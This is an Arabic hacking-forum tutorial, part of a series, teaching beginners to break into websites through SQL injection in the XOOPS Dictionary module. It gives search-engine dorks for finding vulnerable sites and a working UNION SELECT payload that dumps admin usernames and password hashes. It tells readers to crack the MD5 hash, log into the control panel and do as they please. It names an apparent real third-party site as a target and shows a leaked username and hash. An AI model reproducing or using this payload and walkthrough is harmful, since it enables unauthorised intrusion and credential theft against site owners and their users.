منتدى الهكر السني

اهلا بك زائرنا الكريم في منتدى فريق الهكر السني

اذا كنت ترغب في الاستفادة معنا قم بالتسجيل في المنتدى والمشاركة

هكر واختراق اجهزة وحسابات وشبكات وانظمة ومواقع


    الشرح التاسع .. عن ثغرة SQL Injection

    شاطر
    avatar
    هكر تكريت
    مدبر المنتدى
    مدبر المنتدى

    عدد المساهمات : 67
    تاريخ التسجيل : 14/05/2015
    الموقع : حيث انا

    الشرح التاسع .. عن ثغرة SQL Injection

    مُساهمة من طرف هكر تكريت في الأحد أكتوبر 11, 2015 11:25 am

    نبداء بسم الله
    نروح الى احد مواقع الثغرات الكثيره
    وانا اخترت الميل ورم لانه اسهل واحد
    نفتح الصفحة الرئيسيه للموقع

    هدا الموقع يعرض ملايين المواقع المصابة بالثغرات

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    الي يهمنا في هذي الصفحة هو اختراق المواقع بما انك مبتدئ
    الثغرات الي لونهم اصفر هذول اليوم
    والي لونهم اخضر يعني اقدم
    وطبعا التاريخ مكتوب على جنب
    انا بختار وحدة من الثغرات الموجوده
    و اخترت هذي الثغره
    XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
    مكتوب فيها كـ التالي
    كود:

    ##########################################
    #
    # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
    #
    ##########################################
    #
    ##AUTHOR : S@BUN
    #
    ####HOME : milw0rm - S@BUN
    #
    ####MAİL : hackturkiye.hackturkiye@gmail.com
    #
    ###########################################
    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #
    ###########################################
    EXPLOIT : 
    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################
    Dictionary Version 0.94 by nagl.ch
    Dictionary Version 0.91 by nagl.ch
    Dictionary Version 0.70 by nagl.ch
    ###########################################
    ##################S@BUN####################
    ###########################################
    #####hackturkiye.hackturkiye@gmail.com#####
    ########################################### 
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    طيب نشرح شوي شوي
    الجزاء الاول 

    كود: 
    XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection 

    هذي معلومات عن الثغره
    نوعيتها و وين الثغره موجوده و في اي اصدار
    طيب
    الثغره هذي في سكريبت اسمه XOOPS
    وهذي مجله طبعا
    على اية حال الثغره في dictionary
    الا هو الدليل
    والاصدارات هي
    0.94-0.91-0.70
    والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
    وهي معلومات عن مكتشف الثغره 
    كود: 

     



    #
    ##AUTHOR : S@BUN
    #
    ####HOME : milw0rm - S@BUN
    #
    ####MAİL : hackturkiye.hackturkiye@gmail.com
    #

    ###########################################
    والان اهم جزئين
    الجزاء الاول الدورك

    ###########################################
    كود:

    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #

    طبعا شرحت لكم الدورك في شرح سابق
    الدورك مجموعة من الاكواد تضع في محرك البحث وتجيب لك مواقع مصابة ..
    كود:

    allinurl: "modules/dictionary"

    راح يطلع لك كل المواقع الي موجود فيها
    الثغرة 
    نختار المواقع وونفز

    كود:

    Southwestern Pennsylvania League of Apparition Technologists - Dictionary

    نروح الى الجزاء الثاني المهم
    الا وهو
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    كود:

    ###########################################
    EXPLOIT :

    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################
    وهذا كود الإستغلال
    يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
    وراح يصير رابط الموقع مع الاستغلال كذا
    كود:

    Southwestern Pennsylvania League of Apparition Technologists

    /*
    فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
    طبعا الموضوع ما ينتهي هنا
    الباسوورد مشفر بـ الـ MD5
    والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
    لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
    على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
    يعني الباسوورد مشفر والاسم موجود جنبه
    وهم كذا
    ARC-753 : a19010808cc277ac5cc50548d7a61e8e
    الي بـالون الاحمر هذا الباسوورد المشفر
    والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
    النقطتين الرئسيتين فقط لتفريق بينهم
    بعد ما تفك باسوورد الموقع
    تدخل لوحة تحكم الموقع وتسوي الي يعجبك

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]



    هكذا تكون انتهت حلقتنا لهذا اليوم علي امل القاء بكم في شرح اخر باذن الله

    مع تحياتي اخوكم هاكر الخلافة - أبو حذيفة السيناوي

      مواضيع مماثلة

      -

      الوقت/التاريخ الآن هو السبت ديسمبر 16, 2017 1:45 pm